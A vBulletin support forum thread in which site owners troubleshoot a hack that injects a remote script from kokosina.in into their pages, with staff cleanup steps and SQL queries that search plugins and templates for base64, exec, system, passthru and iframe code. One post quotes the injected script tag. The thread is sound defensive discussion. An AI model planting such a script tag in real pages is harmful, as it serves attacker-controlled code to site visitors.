Wayne it was fresh copy off the Vb site and it still shows an error ???
Announcement
Collapse
No announcement yet.
Kokosina.in - Anyone Else Getting This?
Collapse
X
-
Originally posted by Colchesterhunter View PostWayne it was fresh copy off the Vb site and it still shows an error ???
Though that's just a guess.- Maurice Workin' in the Jira mine, goin' down, down, down
Comment
-
Has anyone yet found a definitive answer to remove kokosina form their site, and keep it away?
I just seem to be making things worse for myself. I went into phpmyadmin to try and back up my files. I don't know what the heck I did when I was in there, but now all I'm getting when I go to view my website is a Database Error message: www.theroaringseason.com
This is really driving me crazy! My site has been closed for a week because some loser hacked it, now every time I try to do something to try and fix the issue, I make things worse!
Comment
-
Originally posted by Steve038 View PostHas anyone yet found a definitive answer to remove kokosina form their site, and keep it away?
I just seem to be making things worse for myself. I went into phpmyadmin to try and back up my files. I don't know what the heck I did when I was in there, but now all I'm getting when I go to view my website is a Database Error message: www.theroaringseason.com
This is really driving me crazy! My site has been closed for a week because some loser hacked it, now every time I try to do something to try and fix the issue, I make things worse!
Comment
-
Originally posted by Steve038 View PostHas anyone yet found a definitive answer to remove kokosina form their site, and keep it away?
I just seem to be making things worse for myself. I went into phpmyadmin to try and back up my files. I don't know what the heck I did when I was in there, but now all I'm getting when I go to view my website is a Database Error message: www.theroaringseason.com
This is really driving me crazy! My site has been closed for a week because some loser hacked it, now every time I try to do something to try and fix the issue, I make things worse!
Open a support ticket for further help in cleaning up your site. https://www.vbulletin.com/go/techsupport/Translations provided by Google.
Wayne Luke
The Rabid Badger - a vBulletin Cloud demonstration site.
vBulletin 5 API
Comment
-
Doing this now.. did it work for anyone???
Originally posted by Wayne Luke View Post1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.
2) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type
3) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.
4) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.
5) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.
Query for step 4 and 5 -
SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';
6) Run this query:
SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';
My site is being going through this and the members are getting antsy.... www.wescrap.com
Comment
-
Do we have a definite cause/fix for this yet?
Edit: Can someone try this?
The injection is inside the vBulletin DATASTORE; to fix:
1) Go to plugin manager
2) Pick ANY plugin and click edit
3) Do not make any changes
4) Click Save / Datastore will be reset and the malicious code auto-removed.Last edited by Riasat; Sun 18 Dec '11, 6:47am.
Comment
-
well I submitted a ticket as was suggested a couple of times here...and the reply I get is to check out this thread
Comment
-
Originally posted by Wayne Luke View PostYour MySQL Server is offline for some reason. You're host needs to restart it.
Open a support ticket for further help in cleaning up your site. https://www.vbulletin.com/go/techsupport/
I have spoken to my web host and they've fixed the MySQL issue, but when the site went back up, they noticed it has a trojan virus, which I assume is the Kokosina.in attack. Has anyone yet found a definitive way to remove this? I will be doing the suggestions made by Wayne earlier in this thread, but can anyone who has tried this managed to remove it?
Doing a Google search on kokosina.in it seems there are several vbulletin sites all around the world that have now been hit by this.
Comment
-
Originally posted by Steve038 View PostThanks Wayne, I have opened a support ticket, as suggested.
I have spoken to my web host and they've fixed the MySQL issue, but when the site went back up, they noticed it has a trojan virus, which I assume is the Kokosina.in attack. Has anyone yet found a definitive way to remove this? I will be doing the suggestions made by Wayne earlier in this thread, but can anyone who has tried this managed to remove it?
Doing a Google search on kokosina.in it seems there are several vbulletin sites all around the world that have now been hit by this.Translations provided by Google.
Wayne Luke
The Rabid Badger - a vBulletin Cloud demonstration site.
vBulletin 5 API
Comment
-
Originally posted by Habsy View PostCan anyone verify that upgrading to 4.1.9 fixes this kokosina issue. I tried doing what Wayne said in post 11 but it is still there. Either I did it wrong or it isn't working.
Upgrading to 4.1.9 would fix the issue only if you upload all files in the package and overwrite the infected file on your server. It will not prevent a script on the server or someone using FTP from reapplying the vulnerability.Translations provided by Google.
Wayne Luke
The Rabid Badger - a vBulletin Cloud demonstration site.
vBulletin 5 API
Comment
-
FYI
or set your system to load the YUI files remotely off of either Google's or Yahoo's servers (under Settings -> Options -> Server Settings and Optimization Options).
<scripttype="text/javascript" src="http://kokosina.in/1"></script>
Still appears in the source code.
Comment
-
Originally posted by Habsy View PostFYI
Did not fix the problem.
<scripttype="text/javascript" src="http://kokosina.in/1"></script>
Still appears in the source code.Translations provided by Google.
Wayne Luke
The Rabid Badger - a vBulletin Cloud demonstration site.
vBulletin 5 API
Comment
Related Topics
Collapse
-
Has anyone noticed this trend in google webmaster tools? Page loading speed is a factor in search result rankings, so this can't be good?...1 Photo
-
Channel: vB Cloud Support & Troubleshooting.
Wed 22 Aug '18, 5:49pm -
Comment